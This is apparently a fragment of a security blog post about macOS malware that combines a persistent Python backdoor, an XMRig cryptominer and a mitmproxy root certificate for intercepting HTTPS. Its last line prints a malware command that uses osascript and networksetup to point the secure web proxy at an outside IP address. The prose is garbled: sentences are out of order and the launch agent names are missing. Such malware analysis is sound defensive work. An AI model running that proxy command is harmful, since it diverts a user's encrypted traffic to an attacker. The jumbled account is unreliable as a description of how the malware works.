![]() It's important to keep in mind that the cryptominer was installed through a command issued by the backdoor, and there may very well have been other arbitrary commands sent to infected Macs by the backdoor in the past. ![]() Cryptominers typically only cause the computer to slow down, thanks to a process that sucks up all the CPU/GPU. On the surface, this malware appears to be fairly harmless. However, that code was commented out, indicating it was not active. Interestingly, there's code in that script to download and install a root certificate associated with the mitmproxy software, which is software capable of intercepting all web traffic, including (with the aid of the certificate) encrypted "https" traffic. (The "com.apple" name is an immediate red flag that was the root cause of the discovery of this malware.) The script also downloads the XMRig cryptominer and a config file into the /Users/Shared/ folder, and sets up a launch agent named to keep the XMRig process running with that configuration active. ![]() A launch agent named was created to keep the backdoor open persistently by running exactly the same obfuscated Python script mentioned previously. This script downloads and installs the other components of the malware. # osascript -e "do shell script \"networksetup -setsecurewebproxy "Wi-Fi" 46.226.108.171 8080
0 Comments
Leave a Reply. |